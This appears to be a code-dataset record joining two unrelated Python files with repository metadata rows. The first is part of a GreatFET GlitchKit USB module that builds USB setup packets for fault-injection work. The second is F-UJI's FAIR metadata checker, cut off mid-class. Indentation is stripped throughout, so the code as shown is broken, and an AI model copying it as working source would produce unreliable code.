2022-02-26T15:41:20.000Z
|
#
# This file is part of GreatFET
#
from __future__ import absolute_import
import usb
import time
import codecs
from .base import GlitchKitModule
from ..protocol import vendor_requests
# Quirk constant that helps us identify libusb's pipe errors, which bubble
# up as generic USBErrors with errno 60 on affected platforms.
LIBUSB_TIMEOUT = 60
LIBUSB_IO_ERROR = 5
class GlitchKitUSB(GlitchKitModule):
"""
"""
SHORT_NAME = 'usb'
HOST_TRANSFER_QUEUED = 0x002
HOST_SETUP_TRANSFER_QUEUED = 0x004
HOST_IN_TRANSFER_QUEUED = 0x008
HOST_OUT_TRANSFER_QUEUED = 0x010
HOST_TRANSFER_COMPLETE = 0x020
HOST_SETUP_TRANSFER_COMPLETE = 0x040
HOST_IN_TRANSFER_COMPLETE = 0x100
HOST_OUT_TRANSFER_COMPLETE = 0x080
DEVICE_TRANSFER_COMPLETE = 0x200
VBUS_ENABLED = 0x400
READ_INCOMPLETE = 0xFFFFFFFF
PRE_RESPONSE_DELAY = 0.01
# TODO: Figure out what should be in here vs in FaceDancer.
GET_DESCRIPTOR = 0x6
GET_DEVICE_DESCRIPTOR = 1 << 8
def __init__(self, board):
"""
Create a new GlitchKit module allowing inducing or waiting for USB
events, and then glitching.
Args:
board -- A representation of the GreatFET that will perform the actual
triggering.
"""
# Store a reference to the parent board.
self.board = board
self.api = board.apis.glitchkit_usb
@staticmethod
def supports_board(board):
""" Determines if this GreatFET supports GlitchKit via USB. """
return board.supports_api("glitchkit_usb")
def configure_future_requests(self, continue_despite_errors, disable_vbus_afterwards):
""" Configure future requests made by this GlitchKit module.
Arguments:
continue_despite_errors -- True iff stimuli should continue even
if errors occur.
disable_vbus_afterwards -- If set, VBUS will be disconnected after
a given USB request.
"""
self.api.configure_requests(continue_despite_errors, disable_vbus_afterwards)
@staticmethod
def _split(value):
# TODO: get rid of this
value_high = value >> 8
value_low = value & 0xFF
return [value_low, value_high]
@staticmethod
def build_request_type(is_in, type, recipient):
# TODO: FIXME: clean up consts
request_type = 0
if is_in:
request_type |= (1 << 7)
request_type |= (type << 5)
request_type |= (recipient)
return request_type
def build_setup_request(self, is_in=True, request_type=0, recipient=0, request=0, value=0, index=0, length=0):
# uint8_t request_type;
# uint8_t request;
# uint16_t value;
# uint16_t index;
# uint16_t length;
# TODO: replace me with a call to struct.pack?
setup_request = [self.build_request_type(is_in, request_type, recipient), request]
setup_request.extend(self._split(value))
setup_request.extend(self._split(index))
setup_request.extend(self._split(length))
return setup_request
def capture_control_in(self, request_type=0, recipient=0, request=0, value=0, index=0, length=0, timeout=30, ui_event_call=False):
# Build a setup packet...
setup_packet = bytes(self.build_setup_request(True, request_type, recipient, request, value, index, length))
# ... and issue the request.
return self.api.control_in(setup_packet, timeout=timeout * 1024)
| 28.20155
| 134
| 0.653931
|
8b06d8fc5ed8b8105fc46a7d5af782f9dbeb66fa
| 39,808
|
py
|
Python
|
fuji_server/controllers/fair_check.py
|
EOSC-synergy/FUJI_pipeline.sqaaas
|
589e8cc831c58d985076bf924b4ce1571c87209b
|
[
"MIT"
] | null | null | null |
fuji_server/controllers/fair_check.py
|
EOSC-synergy/FUJI_pipeline.sqaaas
|
589e8cc831c58d985076bf924b4ce1571c87209b
|
[
"MIT"
] | null | null | null |
fuji_server/controllers/fair_check.py
|
EOSC-synergy/FUJI_pipeline.sqaaas
|
589e8cc831c58d985076bf924b4ce1571c87209b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2020 PANGAEA (https://www.pangaea.de/)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import io
import logging
import mimetypes
import re
import sys
import urllib
import urllib.request as urllib
from typing import List, Any
from urllib.parse import urlparse
import Levenshtein
import idutils
import lxml
import rdflib
from rdflib.namespace import RDF
from rdflib.namespace import DCTERMS
from rdflib.namespace import DC
from rapidfuzz import fuzz
from rapidfuzz import process
from tika import parser
import hashlib
from fuji_server.evaluators.fair_evaluator_license import FAIREvaluatorLicense
from fuji_server.evaluators.fair_evaluator_data_access_level import FAIREvaluatorDataAccessLevel
from fuji_server.evaluators.fair_evaluator_persistent_identifier import FAIREvaluatorPersistentIdentifier
from fuji_server.evaluators.fair_evaluator_unique_identifier import FAIREvaluatorUniqueIdentifier
from fuji_server.evaluators.fair_evaluator_minimal_metadata import FAIREvaluatorCoreMetadata
from fuji_server.evaluators.fair_evaluator_content_included import FAIREvaluatorContentIncluded
from fuji_server.evaluators.fair_evaluator_related_resources import FAIREvaluatorRelatedResources
from fuji_server.evaluators.fair_evaluator_searchable import FAIREvaluatorSearchable
from fuji_server.evaluators.fair_evaluator_file_format import FAIREvaluatorFileFormat
from fuji_server.evaluators.fair_evaluator_data_provenance import FAIREvaluatorDataProvenance
from fuji_server.evaluators.fair_evaluator_data_content_metadata import FAIREvaluatorDataContentMetadata
from fuji_server.evaluators.fair_evaluator_formal_metadata import FAIREvaluatorFormalMetadata
from fuji_server.evaluators.fair_evaluator_semantic_vocabulary import FAIREvaluatorSemanticVocabulary
from fuji_server.evaluators.fair_evaluator_metadata_preservation import FAIREvaluatorMetadataPreserved
from fuji_server.evaluators.fair_evaluator_community_metadata import FAIREvaluatorCommunityMetadata
from fuji_server.evaluators.fair_evaluator_standardised_protocol_data import FAIREvaluatorStandardisedProtocolData
from fuji_server.evaluators.fair_evaluator_standardised_protocol_metadata import FAIREvaluatorStandardisedProtocolMetadata
from fuji_server.helper.metadata_collector import MetaDataCollector
from fuji_server.helper.metadata_collector_datacite import MetaDataCollectorDatacite
from fuji_server.helper.metadata_collector_dublincore import MetaDataCollectorDublinCore
from fuji_server.helper.metadata_collector_microdata import MetaDataCollectorMicroData
from fuji_server.helper.metadata_collector_opengraph import MetaDataCollectorOpenGraph
from fuji_server.helper.metadata_collector_rdf import MetaDataCollectorRdf
from fuji_server.helper.metadata_collector_schemaorg import MetaDataCollectorSchemaOrg
from fuji_server.helper.metadata_collector_xml import MetaDataCollectorXML
from fuji_server.helper.metadata_mapper import Mapper
from fuji_server.helper.metadata_provider_oai import OAIMetadataProvider
from fuji_server.helper.metadata_provider_sparql import SPARQLMetadataProvider
from fuji_server.helper.preprocessor import Preprocessor
from fuji_server.helper.repository_helper import RepositoryHelper
class FAIRCheck:
METRICS = None
SPDX_LICENSES = None
SPDX_LICENSE_NAMES = None
COMMUNITY_STANDARDS_NAMES = None
COMMUNITY_METADATA_STANDARDS_URIS = None
COMMUNITY_METADATA_STANDARDS_URIS_LIST = None
COMMUNITY_STANDARDS = None
SCIENCE_FILE_FORMATS = None
LONG_TERM_FILE_FORMATS = None
OPEN_FILE_FORMATS = None
DEFAULT_NAMESPACES = None
VOCAB_NAMESPACES = None
ARCHIVE_MIMETYPES = Mapper.ARCHIVE_COMPRESS_MIMETYPES.value
STANDARD_PROTOCOLS = None
SCHEMA_ORG_CONTEXT = []
FILES_LIMIT = None
LOG_SUCCESS = 25
VALID_RESOURCE_TYPES = []
FUJI_VERSION = 'v1.0.5c'
def __init__(self, uid, test_debug=False, oaipmh=None, use_datacite=True):
uid_bytes = uid.encode('utf-8')
self.test_id = hashlib.sha1(uid_bytes).hexdigest()
#str(base64.urlsafe_b64encode(uid_bytes), "utf-8") # an id we can use for caching etc
self.id = uid
self.oaipmh_endpoint = oaipmh
self.pid_url = None # full pid # e.g., "https://doi.org/10.1594/pangaea.906092 or url (non-pid)
self.landing_url = None # url of the landing page of self.pid_url
self.origin_url = None #the url from where all starts - in case of redirection we'll need this later on
self.landing_html = None
self.landing_origin = None # schema + authority of the landing page e.g. https://www.pangaea.de
self.signposting_header_links = []
self.pid_scheme = None
self.id_scheme= None
self.logger = logging.getLogger(__name__)
self.metadata_sources = []
self.isDebug = test_debug
self.isMetadataAccessible = None
self.metadata_merged = {}
self.content_identifier=[]
self.community_standards = []
self.community_standards_uri = {}
self.namespace_uri=[]
self.reference_elements = Mapper.REFERENCE_METADATA_LIST.value.copy() # all metadata elements required for FUJI metrics
self.related_resources = []
# self.test_data_content_text = None# a helper to check metadata against content
self.rdf_graph = None
self.sparql_endpoint = None
self.rdf_collector = None
self.use_datacite = use_datacite
self.repeat_pid_check = False
self.logger_message_stream = io.StringIO()
logging.addLevelName(self.LOG_SUCCESS, 'SUCCESS')
if self.isDebug:
self.logStreamHandler = logging.StreamHandler(self.logger_message_stream)
formatter = logging.Formatter('%(message)s|%(levelname)s')
self.logStreamHandler.setFormatter(formatter)
self.logger.propagate = False
self.logger.setLevel(logging.INFO) # set to debug in testing environment
self.logger.addHandler(self.logStreamHandler)
self.count = 0
FAIRCheck.load_predata()
self.extruct = None
self.extruct_result = None
self.tika_content_types_list = []
@classmethod
def load_predata(cls):
cls.FILES_LIMIT = Preprocessor.data_files_limit
if not cls.METRICS:
cls.METRICS = Preprocessor.get_custom_metrics(['metric_name', 'total_score','metric_tests'])
if not cls.SPDX_LICENSES:
# cls.SPDX_LICENSES, cls.SPDX_LICENSE_NAMES, cls.SPDX_LICENSE_URLS = Preprocessor.get_licenses()
cls.SPDX_LICENSES, cls.SPDX_LICENSE_NAMES = Preprocessor.get_licenses()
if not cls.COMMUNITY_METADATA_STANDARDS_URIS:
cls.COMMUNITY_METADATA_STANDARDS_URIS = Preprocessor.get_metadata_standards_uris()
cls.COMMUNITY_METADATA_STANDARDS_URIS_LIST = list(cls.COMMUNITY_METADATA_STANDARDS_URIS.keys())
if not cls.COMMUNITY_STANDARDS:
cls.COMMUNITY_STANDARDS = Preprocessor.get_metadata_standards()
cls.COMMUNITY_STANDARDS_NAMES = list(cls.COMMUNITY_STANDARDS.keys())
if not cls.SCIENCE_FILE_FORMATS:
cls.SCIENCE_FILE_FORMATS = Preprocessor.get_science_file_formats()
if not cls.LONG_TERM_FILE_FORMATS:
cls.LONG_TERM_FILE_FORMATS = Preprocessor.get_long_term_file_formats()
if not cls.OPEN_FILE_FORMATS:
cls.OPEN_FILE_FORMATS = Preprocessor.get_open_file_formats()
if not cls.DEFAULT_NAMESPACES:
cls.DEFAULT_NAMESPACES = Preprocessor.getDefaultNamespaces()
if not cls.VOCAB_NAMESPACES:
cls.VOCAB_NAMESPACES = Preprocessor.getLinkedVocabs()
if not cls.STANDARD_PROTOCOLS:
cls.STANDARD_PROTOCOLS = Preprocessor.get_standard_protocols()
if not cls.SCHEMA_ORG_CONTEXT:
cls.SCHEMA_ORG_CONTEXT = Preprocessor.get_schema_org_context()
if not cls.VALID_RESOURCE_TYPES:
cls.VALID_RESOURCE_TYPES = Preprocessor.get_resource_types()
@staticmethod
def uri_validator(u): # TODO integrate into request_helper.py
try:
r = urlparse(u)
return all([r.scheme, r.netloc])
except:
return False
def retrieve_metadata(self, extruct_metadata):
if isinstance(extruct_metadata, dict):
embedded_exists = {k: v for k, v in extruct_metadata.items() if v}
self.extruct = embedded_exists.copy()
if embedded_exists: # retrieve metadata from landing page
self.logger.info(
'FsF-F2-01M : Formats of structured metadata embedded in HTML markup - {}'.format(
list(embedded_exists.keys())))
self.retrieve_metadata_embedded(embedded_exists)
else:
self.logger.warning('FsF-F2-01M : NO structured metadata embedded in HTML')
if self.reference_elements: # this will be always true as we need datacite client id
self.retrieve_metadata_external()
# ========= clean merged metadata, delete all entries which are None or ''
data_objects = self.metadata_merged.get('object_content_identifier')
if data_objects == {'url': None} or data_objects == [None]:
data_objects = self.metadata_merged['object_content_identifier'] = None
if data_objects is not None:
if not isinstance(data_objects, list):
self.metadata_merged['object_content_identifier']=[data_objects]
# TODO quick-fix to merge size information - should do it at mapper
if 'object_content_identifier' in self.metadata_merged:
if self.metadata_merged.get('object_content_identifier'):
for c in self.metadata_merged['object_content_identifier']:
if not c.get('size') and self.metadata_merged.get('object_size'):
c['size'] = self.metadata_merged.get('object_size')
for mk, mv in list(self.metadata_merged.items()):
if mv == '' or mv is None:
del self.metadata_merged[mk]
self.logger.info('FsF-F2-01M : Type of object described by the metadata - {}'.format(self.metadata_merged.get('object_type')))
# detect api and standards
self.retrieve_apis_standards()
# remove duplicates
if self.namespace_uri:
self.namespace_uri = list(set(self.namespace_uri))
def retrieve_apis_standards(self):
if self.landing_url is not None:
self.logger.info('FsF-R1.3-01M : Retrieving API and Standards')
client_id = self.metadata_merged.get('datacite_client')
self.logger.info('FsF-R1.3-01M : re3data/datacite client id - {}'.format(client_id))
if self.oaipmh_endpoint:
self.logger.info('{} : OAI-PMH endpoint provided as part of the request.'.format('FsF-R1.3-01M'))
else:
#find endpoint via datacite/re3data if pid is provided
if client_id and self.pid_scheme:
self.logger.info('{} : Inferring endpoint information through re3data/datacite services'.format('FsF-R1.3-01M'))
repoHelper = RepositoryHelper(client_id, self.pid_scheme)
repoHelper.lookup_re3data()
self.oaipmh_endpoint = repoHelper.getRe3MetadataAPIs().get('OAI-PMH')
self.sparql_endpoint = repoHelper.getRe3MetadataAPIs().get('SPARQL')
self.community_standards.extend(repoHelper.getRe3MetadataStandards())
self.logger.info('{} : Metadata standards listed in re3data record - {}'.format('FsF-R1.3-01M', self.community_standards ))
# retrieve metadata standards info from oai-pmh
if self.oaipmh_endpoint:
self.logger.info('{} : Use OAI-PMH endpoint to retrieve standards used by the repository - {}'.format('FsF-R1.3-01M',self.oaipmh_endpoint))
if (self.uri_validator(self.oaipmh_endpoint)):
oai_provider = OAIMetadataProvider(endpoint=self.oaipmh_endpoint, logger=self.logger,metric_id='FsF-R1.3-01M')
self.community_standards_uri = oai_provider.getMetadataStandards()
self.namespace_uri.extend(oai_provider.getNamespaces())
stds = None
if self.community_standards_uri:
stds = list(self.community_standards_uri.keys())
self.logger.log(self.LOG_SUCCESS,'{} : Found disciplinary standards that are listed in OAI-PMH endpoint - {}'.format('FsF-R1.3-01M',stds ))
else:
self.logger.info('{} : Invalid endpoint'.format('FsF-R1.3-01M'))
else:
self.logger.warning('{} : NO OAI-PMH endpoint found'.format('FsF-R1.3-01M'))
else:
self.logger.warning('{} : Skipped external ressources (OAI, re3data) checks since landing page could not be resolved'.format('FsF-R1.3-01M'))
def retrieve_metadata_embedded(self, extruct_metadata):
isPid = False
if self.pid_scheme:
isPid = True
# ========= retrieve embedded rdfa and microdata metadata ========
micro_meta = extruct_metadata.get('microdata')
microdata_collector = MetaDataCollectorMicroData(loggerinst=self.logger, sourcemetadata=micro_meta,
mapping=Mapper.MICRODATA_MAPPING)
source_micro, micro_dict = microdata_collector.parse_metadata()
if micro_dict:
self.metadata_sources.append((source_micro,'embedded'))
self.namespace_uri.extend(microdata_collector.getNamespaces())
micro_dict = self.exclude_null(micro_dict)
for i in micro_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = micro_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found microdata metadata: '+str(micro_dict.keys()))
#================== RDFa
RDFA_ns = rdflib.Namespace("http://www.w3.org/ns/rdfa#")
rdfasource = MetaDataCollector.Sources.RDFA.value
rdfagraph = None
errors=[]
try:
rdfagraph = rdflib.Graph()
rdfagraph.parse(data=self.landing_html, format='rdfa')
rdfa_collector = MetaDataCollectorRdf(loggerinst=self.logger, target_url=self.landing_url, source=rdfasource,
rdf_graph=rdfagraph)
source_rdfa, rdfa_dict = rdfa_collector.parse_metadata()
self.metadata_sources.append((rdfasource,'embedded'))
self.namespace_uri.extend(rdfa_collector.getNamespaces())
#rdfa_dict['object_identifier']=self.pid_url
rdfa_dict = self.exclude_null(rdfa_dict)
for i in rdfa_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = rdfa_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found RDFa metadata: '+str(rdfa_dict.keys()))
except:
self.logger.info('FsF-F2-01M : RDFa metadata parsing exception, probably no RDFa embedded in HTML')
# ========= retrieve schema.org (embedded, or from via content-negotiation if pid provided) =========
ext_meta = extruct_metadata.get('json-ld')
if self.use_datacite is True:
target_url = self.pid_url
else:
target_url = self.landing_url
schemaorg_collector = MetaDataCollectorSchemaOrg(loggerinst=self.logger, sourcemetadata=ext_meta,
mapping=Mapper.SCHEMAORG_MAPPING, pidurl=target_url)
source_schemaorg, schemaorg_dict = schemaorg_collector.parse_metadata()
schemaorg_dict = self.exclude_null(schemaorg_dict)
if schemaorg_dict:
self.namespace_uri.extend(schemaorg_collector.namespaces)
#not_null_sco = [k for k, v in schemaorg_dict.items() if v is not None]
if source_schemaorg == MetaDataCollector.Sources.SCHEMAORG_EMBED.value:
self.metadata_sources.append((source_schemaorg,'embedded'))
else:
self.metadata_sources.append((source_schemaorg, 'negotiated'))
if schemaorg_dict.get('related_resources'):
self.related_resources.extend(schemaorg_dict.get('related_resources'))
if schemaorg_dict.get('object_content_identifier'):
self.logger.info('FsF-F3-01M : Found data links in Schema.org metadata : ' + str(schemaorg_dict.get('object_content_identifier')))
# add object type for future reference
for i in schemaorg_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = schemaorg_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found Schema.org metadata: '+str(schemaorg_dict.keys()))
else:
self.logger.info('FsF-F2-01M : Schema.org metadata UNAVAILABLE')
# ========= retrieve dublin core embedded in html page =========
if self.reference_elements:
self.logger.info('FsF-F2-01M : Checking for DublinCore metadata')
dc_collector = MetaDataCollectorDublinCore(loggerinst=self.logger, sourcemetadata=self.landing_html,
mapping=Mapper.DC_MAPPING)
source_dc, dc_dict = dc_collector.parse_metadata()
dc_dict = self.exclude_null(dc_dict)
if dc_dict:
self.namespace_uri.extend(dc_collector.namespaces)
#not_null_dc = [k for k, v in dc_dict.items() if v is not None]
self.metadata_sources.append((source_dc,'embedded'))
if dc_dict.get('related_resources'):
self.related_resources.extend(dc_dict.get('related_resources'))
for d in dc_dict.keys():
if d in self.reference_elements:
self.metadata_merged[d] = dc_dict[d]
self.reference_elements.remove(d)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found DublinCore metadata: '+str(dc_dict.keys()))
else:
self.logger.info('FsF-F2-01M : DublinCore metadata UNAVAILABLE')
# ======== retrieve OpenGraph metadata
ext_meta = extruct_metadata.get('opengraph')
opengraph_collector = MetaDataCollectorOpenGraph(loggerinst=self.logger, sourcemetadata=ext_meta,
mapping=Mapper.OG_MAPPING)
source_opengraph, opengraph_dict = opengraph_collector.parse_metadata()
opengraph_dict = self.exclude_null(opengraph_dict)
if opengraph_dict:
self.namespace_uri.extend(opengraph_collector.namespaces)
self.metadata_sources.append((source_opengraph,'embedded'))
for i in opengraph_dict.keys():
if i in self.reference_elements:
self.metadata_merged[i] = opengraph_dict[i]
self.reference_elements.remove(i)
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found OpenGraph metadata: ' + str(opengraph_dict.keys()))
else:
self.logger.info('FsF-F2-01M : Schema.org metadata UNAVAILABLE')
#========= retrieve signposting data links
data_sign_links = self.get_signposting_links('item')
if data_sign_links:
self.logger.info('FsF-F3-01M : Found data links in response header (signposting) : ' + str(len(data_sign_links)))
if self.metadata_merged.get('object_content_identifier') is None:
self.metadata_merged['object_content_identifier'] = data_sign_links
#========= retrieve typed data object links =========
data_meta_links = self.get_html_typed_links(rel='item')
if data_meta_links:
self.logger.info('FsF-F3-01M : Found data links in HTML head (link rel=item) : ' + str(len(data_meta_links)))
if self.metadata_merged.get('object_content_identifier') is None:
self.metadata_merged['object_content_identifier'] = data_meta_links
# self.metadata_sources.append((MetaDataCollector.Sources.TYPED_LINK.value,'linked'))
#Now if an identifier has been detected in the metadata, potentially check for persistent identifier has to be repeated..
if self.metadata_merged.get('object_identifier'):
if isinstance(self.metadata_merged.get('object_identifier'),list):
identifiertotest = self.metadata_merged.get('object_identifier')[0]
else:
identifiertotest = self.metadata_merged.get('object_identifier')
if self.pid_scheme is None:
#print(self.metadata_merged.get('object_identifier'))
found_pids_in_metadata = idutils.detect_identifier_schemes(identifiertotest)
if len(found_pids_in_metadata) > 1:
if 'url' in found_pids_in_metadata:
found_pids_in_metadata.remove('url')
found_id = found_pids_in_metadata[0]
if found_id in Mapper.VALID_PIDS.value:
self.logger.info('FsF-F2-01M : Found object identifier in metadata, repeating PID check for FsF-F1-02D')
self.logger.log(self.LOG_SUCCESS, 'FsF-F1-02D : Found object identifier in metadata during FsF-F2-01M, PID check was repeated')
self.repeat_pid_check = True
self.pid_scheme = found_id
self.id = identifiertotest
# Comment: not sure if we really need a separate class as proposed below. Instead we can use a dictionary
# TODO (important) separate class to represent https://www.iana.org/assignments/link-relations/link-relations.xhtml
# use IANA relations for extracting metadata and meaningful links
def get_html_typed_links(self, rel="item"):
# Use Typed Links in HTTP Link headers to help machines find the resources that make up a publication.
# Use links to find domains specific metadata
datalinks = []
if isinstance(self.landing_html, str):
dom = lxml.html.fromstring(self.landing_html.encode('utf8'))
links=dom.xpath('/*/head/link[@rel="'+rel+'"]')
for l in links:
href=l.attrib.get('href')
#handle relative paths
if href.startswith('/'):
href=self.landing_origin+href
datalinks.append({'url': href, 'type': l.attrib.get('type'), 'rel': l.attrib.get('rel'), 'profile': l.attrib.get('format')})
return datalinks
def get_signposting_links(self, rel="item"):
signlinks =[]
for signposting_links in self.signposting_header_links:
if signposting_links.get('rel') == rel:
signlinks.append(signposting_links)
return signlinks
def get_guessed_xml_link(self):
# in case object landing page URL ends with '.html' or '/html'
# try to find out if there is some xml content if suffix is replaced by 'xml
datalink = None
if self.landing_url is not None:
suff_res = re.search(r".*[\.\/](html?)?$", self.landing_url)
if suff_res is not None:
if suff_res[1] is not None:
guessed_link = self.landing_url.replace(suff_res[1],'xml')
try:
response=urllib.urlopen(guessed_link)
if response.getheader('Content-Type') in ['text/xml','application/rdf+xml']:
datalink={'source':'guessed','url': guessed_link, 'type': response.getheader('Content-Type'), 'rel': 'alternate'}
self.logger.log(self.LOG_SUCCESS, 'FsF-F2-01M : Found XML content at: '+guessed_link)
except:
self.logger.info('FsF-F2-01M : Guessed XML retrieval failed for: '+guessed_link)
return datalink
def retrieve_metadata_external(self):
test_content_negotiation = False
test_typed_links = False
test_signposting = False
test_embedded = False
# ========= retrieve xml metadata namespaces by content negotiation ========
if self.landing_url is not None:
self.logger.info('FsF-F2-01M : Trying to retrieve XML metadata through content negotiation')
negotiated_xml_collector = MetaDataCollectorXML(loggerinst=self.logger,target_url=self.landing_url, link_type='negotiated')
source_neg_xml, metadata_neg_dict = negotiated_xml_collector.parse_metadata()
metadata_neg_dict = self.exclude_null(metadata_neg_dict)
if metadata_neg_dict:
test_content_negotiation = True
#TODO: Finish this ...
# ========= retrieve rdf metadata namespaces by content negotiation ========
self.logger.info('FsF-F2-01M : Trying to retrieve RDF metadata through content negotiation')
source = MetaDataCollector.Sources.LINKED_DATA.value
if self.pid_scheme == 'purl':
targeturl = self.pid_url
else:
targeturl = self.landing_url
neg_rdf_collector = MetaDataCollectorRdf(loggerinst=self.logger, target_url=targeturl,
source=source)
if neg_rdf_collector is not None:
source_rdf, rdf_dict = neg_rdf_collector.parse_metadata()
# in case F-UJi was redirected and the landing page content negotiation doesnt return anything try the origin URL
if not rdf_dict:
if self.origin_url is not None:
neg_rdf_collector.target_url = self.origin_url
source_rdf, rdf_dict = neg_rdf_collector.parse_metadata()
self.namespace_uri.extend(neg_rdf_collector.getNamespaces())
rdf_dict = self.exclude_null(rdf_dict)
if rdf_dict:
if rdf_dict.get('object_content_identifier'):
self.logger.info('FsF-F3-01M : Found data links in RDF metadata : ' + str(
len(rdf_dict.get('object_content_identifier'))))
test_content_negotiation = True
self.logger.log(self.LOG_SUCCESS,
'FsF-F2-01M : Found Linked Data metadata: {}'.format(str(rdf_dict.keys())))
self.metadata_sources.append((source_rdf,'negotiated'))
for r in rdf_dict.keys():
if r in self.reference_elements:
self.metadata_merged[r] = rdf_dict[r]
self.reference_elements.remove(r)
else:
self.logger.info('FsF-F2-01M : Linked Data metadata UNAVAILABLE')
# ========= retrieve datacite json metadata based on pid =========
if self.pid_scheme:
# ================= datacite by content negotiation ===========
# in case use_datacite id false use the landing page URL for content negotiation, otherwise the pid url
if self.use_datacite is True:
datacite_target_url = self.pid_url
else:
datacite_target_url = self.landing_url
dcite_collector = MetaDataCollectorDatacite(mapping=Mapper.DATACITE_JSON_MAPPING, loggerinst=self.logger,
pid_url=datacite_target_url)
source_dcitejsn, dcitejsn_dict = dcite_collector.parse_metadata()
dcitejsn_dict = self.exclude_null(dcitejsn_dict)
if dcitejsn_dict:
test_content_negotiation = True
# not_null_dcite = [k for k, v in dcitejsn_dict.items() if v is not None]
self.metadata_sources.append((source_dcitejsn,'negotiated'))
self.logger.log(self.LOG_SUCCESS,'FsF-F2-01M : Found Datacite metadata: {}'.format(str(dcitejsn_dict.keys())))
if dcitejsn_dict.get('object_content_identifier'):
self.logger.info('FsF-F3-01M : Found data links in Datacite metadata : ' + str(
dcitejsn_dict.get('object_content_identifier')))
if dcitejsn_dict.get('related_resources'):
self.related_resources.extend(dcitejsn_dict.get('related_resources'))
for r in dcitejsn_dict.keys():
# only merge when the value cannot be retrived from embedded metadata
if r in self.reference_elements and not self.metadata_merged.get(r):
self.metadata_merged[r] = dcitejsn_dict[r]
self.reference_elements.remove(r)
else:
self.logger.info('FsF-F2-01M : Datacite metadata UNAVAILABLE')
else:
self.logger.info('FsF-F2-01M : Not a PID, therefore Datacite metadata (json) not requested.')
sign_header_links = []
#signposting header links
if self.get_signposting_links('describedby'):
sign_header_links = self.get_signposting_links('describedby')
self.metadata_sources.append((MetaDataCollector.Sources.SIGN_POSTING.value, 'signposting'))
#dcat style meta links
typed_metadata_links = self.get_html_typed_links(rel='alternate')
#ddi style meta links
rel_meta_links = self.get_html_typed_links(rel='meta')
#signposting style meta links
sign_meta_links = self.get_html_typed_links(rel='describedby')
typed_metadata_links.extend(sign_meta_links)
typed_metadata_links.extend(rel_meta_links)
typed_metadata_links.extend(sign_header_links)
guessed_metadata_link = self.get_guessed_xml_link()
if guessed_metadata_link is not None:
typed_metadata_links.append(guessed_metadata_link)
if typed_metadata_links is not None:
typed_rdf_collector = None
for metadata_link in typed_metadata_links:
if metadata_link['type'] in ['application/rdf+xml','text/n3','text/ttl','application/ld+json']:
self.logger.info('FsF-F2-01M : Found e.g. Typed Links in HTML Header linking to RDF Metadata ('+str(metadata_link['type']+')'))
found_metadata_link=True
source = MetaDataCollector.Sources.RDF_TYPED_LINKS.value
typed_rdf_collector = MetaDataCollectorRdf(loggerinst=self.logger, target_url=metadata_link['url'], source=source )
elif metadata_link['type'] in ['text/xml','application/x-ddi-l+xml','application/x-ddametadata+xml']:
self.logger.info('FsF-F2-01M : Found e.g. Typed Links in HTML Header linking to XML Metadata (' + str(
metadata_link['type'] + ')'))
typed_rdf_collector = MetaDataCollectorXML(loggerinst=self.logger,
target_url=metadata_link['url'], link_type=metadata_link.get('source'))
if typed_rdf_collector is not None:
source_rdf, rdf_dict = typed_rdf_collector.parse_metadata()
self.namespace_uri.extend(typed_rdf_collector.getNamespaces())
rdf_dict = self.exclude_null(rdf_dict)
if rdf_dict:
test_typed_links = True
self.logger.log(self.LOG_SUCCESS,'FsF-F2-01M : Found Linked Data metadata: {}'.format(str(rdf_dict.keys())))
self.metadata_sources.append((source_rdf,'linked'))
for r in rdf_dict.keys():
if r in self.reference_elements:
self.metadata_merged[r] = rdf_dict[r]
self.reference_elements.remove(r)
else:
self.logger.info('FsF-F2-01M : Linked Data metadata UNAVAILABLE')
if self.reference_elements:
self.logger.debug('Reference metadata elements NOT FOUND - {}'.format(self.reference_elements))
else:
self.logger.debug('FsF-F2-01M : ALL reference metadata elements available')
def exclude_null(self, dt):
if type(dt) is dict:
return dict((k, self.exclude_null(v)) for k, v in dt.items() if v and self.exclude_null(v))
elif type(dt) is list:
return [self.exclude_null(v) for v in dt if v and self.exclude_null(v)]
else:
return dt
def lookup_metadatastandard_by_name(self, value):
found = None
# get standard name with the highest matching percentage using fuzzywuzzy
highest = process.extractOne(value, FAIRCheck.COMMUNITY_STANDARDS_NAMES, scorer=fuzz.token_sort_ratio)
if highest[1] > 80:
found = highest[0]
return found
def lookup_metadatastandard_by_uri(self, value):
found = None
# get standard uri with the highest matching percentage using fuzzywuzzy
highest = process.extractOne(value, FAIRCheck.COMMUNITY_METADATA_STANDARDS_URIS_LIST,
scorer=fuzz.token_sort_ratio)
if highest[1] > 90:
found = highest[0]
return found
def check_unique_identifier(self):
unique_identifier_check = FAIREvaluatorUniqueIdentifier(self)
unique_identifier_check.set_metric('FsF-F1-01D', metrics=FAIRCheck.METRICS)
return unique_identifier_check.getResult()
def check_persistent_identifier(self):
persistent_identifier_check = FAIREvaluatorPersistentIdentifier(self)
persistent_identifier_check.set_metric('FsF-F1-02D', metrics=FAIRCheck.METRICS)
return persistent_identifier_check.getResult()
def check_unique_persistent(self):
